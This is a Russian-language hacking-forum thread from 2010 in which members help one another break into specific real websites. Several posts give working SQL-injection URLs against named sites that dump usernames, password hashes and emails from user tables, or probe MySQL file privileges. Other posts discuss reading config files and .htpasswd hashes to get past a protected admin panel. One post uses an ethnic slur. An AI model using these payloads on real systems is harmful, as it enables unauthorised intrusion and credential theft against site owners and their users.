Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. boberko

    boberko New Member

    Joined:
    24 Jan 2009
    Messages:
    12
    Likes Received:
    2
    Reputations:
    0
    Gorev, невижу ничего смешного, в бд логин и пароль для доступа нету...
     
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    boberko

    http://www.fcdinamokirov.ru/2010/news10.php?seldate_down=20110101+union+select+1,2,3,group_concat(nick,char(58),password),5,6,7+from+users+--+

    хотя не думаю что это таблица админов
     
    _________________________
  3. boberko

    boberko New Member

    Joined:
    24 Jan 2009
    Messages:
    12
    Likes Received:
    2
    Reputations:
    0
    Konqi
    это таблица простых пользователей, я заходил все пашет...для админов не подходит(
    в бд этих данных точно нету, все пересмотрел не нашел...
    возможно ли как то зайти на исходник файла и узнать логин и пароль? или никак?
     
    #14163 boberko, 16 Jul 2010
    Last edited: 16 Jul 2010
  4. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    если file_priv=Y и знаешь полный путь, то можешь читать файлы(скрипты, конфиги).
     
    _________________________
    #14164 Konqi, 16 Jul 2010
    Last edited: 16 Jul 2010
  5. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274

    какой нахрен смех? я тебе немекнул насчет бейсик авторизации...хоть погуглил бы перед тем как опять херню всякую постить...мде... знания участников форума с каждым днем стремительно уменьшаются...
    где тот грей или джокестер, которые за такие вопросы из новичка делали чайника и ламера :mad:
     
  6. R0nin

    R0nin Member

    Joined:
    11 Jul 2010
    Messages:
    261
    Likes Received:
    24
    Reputations:
    8
    Кому передать ? Это ведь зависит от программы, как и каким способом сохраняет логи.
     
  7. Dare

    Dare Elder - Старейшина

    Joined:
    26 Apr 2010
    Messages:
    53
    Likes Received:
    24
    Reputations:
    17
    Что куда у тебя не подходит? все там норм просто админка под хтаццессом (
    обойти его способ есть, но надо права на запись... а если они есть париться с хтацессом помойму извращение.
    имхо: вопрос в разряд тупые )))
    Горев реально прав, ребята давайте чуток читать )
     
    #14167 Dare, 16 Jul 2010
    Last edited: 17 Jul 2010
  8. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    но если есть file_priv и знаешь путь к сайту то можно читать .htpasswd, а там лежат пароли(хеши(AFAIK md5(unix))) к .htaccess
     
    _________________________
    #14168 Konqi, 17 Jul 2010
    Last edited: 17 Jul 2010
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    представим что ты прав, "инклудим" .htpasswd,
    но это на сколько я знаю не script,a файл содержащий login:hash
    и по твоему этот файл должен исполнятся?
    я конечно этому не верю что file_priv инклудит, но если даже это было бы так, то в нашем случай инклуд=читалка, так как в файле нету кода.
    но как мы знаем я всегда не прав,так что простите за дезинформацию.

    ну а если серьезно то лучше бы ты этого не сказал.
     
    _________________________
    #14169 Konqi, 17 Jul 2010
    Last edited: 17 Jul 2010
    3 people like this.
  10. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,519
    Likes Received:
    401
    Reputations:
    196

    [Feldmarschall], чо?
     
    1 person likes this.
  11. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    File_priv распространяется только на чтение файлов и на их запись, ни о каком инклудинге речи идти не может.
     
    #14171 h00lyshit!, 17 Jul 2010
    Last edited: 18 Jul 2010
    2 people like this.
  12. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    ребята, а где вы тут file_priv видите?
     
  13. Dare

    Dare Elder - Старейшина

    Joined:
    26 Apr 2010
    Messages:
    53
    Likes Received:
    24
    Reputations:
    17
    file_priv - доступ к файлам на сервере!
    вперед читать мануалы, ыыы

    цитирую:
    Konqi:
    Я думаю ты меня не понял, этот вариант возможен, но не рационален... ты же штаны через голову не одеваешь?
    Извини за грубое сравнение ) ты наверное один стараешься здесь все поддержать )
     
    #14173 Dare, 17 Jul 2010
    Last edited: 17 Jul 2010
  14. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    http://www.fcdinamokirov.ru/2010/news10.php?seldate_down=20110101+union+select+1,2,3,FILE_PRIV,5,6,7+from+mysql.user+--+

    где вы здесь увидели file_priv Y? В упор не вижу....
     
    #14174 547, 17 Jul 2010
    Last edited: 18 Jul 2010
    1 person likes this.
  15. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    да нет там нихрена...хз что развели демагогию...никаких прав у юзверя в данном случае нет..и говорить о том как можно было бы сделать , если бы были эти права..я считаю нонсенсом....
     
  16. happygirl

    happygirl New Member

    Joined:
    10 Jul 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    почему не показать номер?

    http://www.ofisdubai.com/brandproductlist.php?brandid=-9999 and 1=0 UNION SELECT 1,2,3,4+--+

    http://www.ofisdubai.com/brandproductlist.php?brandid=-9999 and 1=0 UNION SELECT 1,2,3,4+--+
     
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.ofisdubai.com/newsletterContent.php?id=-8+union+select+1,2,3,4,5
     
    _________________________
    1 person likes this.
  18. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Таким запросом ты его никогда в жизни и не увидишь.
     
    1 person likes this.
  19. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    потому что чуркой быть, это судьба... вы хоть читать умеете? или с пастбища научились в интернет выходить, ковычку подставили и все..ХАЦКЕР мега кул....модеры потрите мой пост если я не прав...предлагаю ввести правило что бы таких юзверей по повторному вопросу по стандартной скуле отсылать как минимум на день в бан... и ссылку на мануал по скулям датЬ...будет и время и источник ..
     
    3 people like this.
  20. .:GOGA:.

    .:GOGA:. Member

    Joined:
    28 Jun 2010
    Messages:
    93
    Likes Received:
    9
    Reputations:
    5
    Чтение файлов нету, максимум что можно от сюда достать так это юзеров (159)
    http://www.fcdinamokirov.ru/2010/news10.php?seldate_down=20110101+union+select+1,2,3,concat_ws(char(58),nick,password,email),5,6,7+from+users--
     
Thread Status:
Not open for further replies.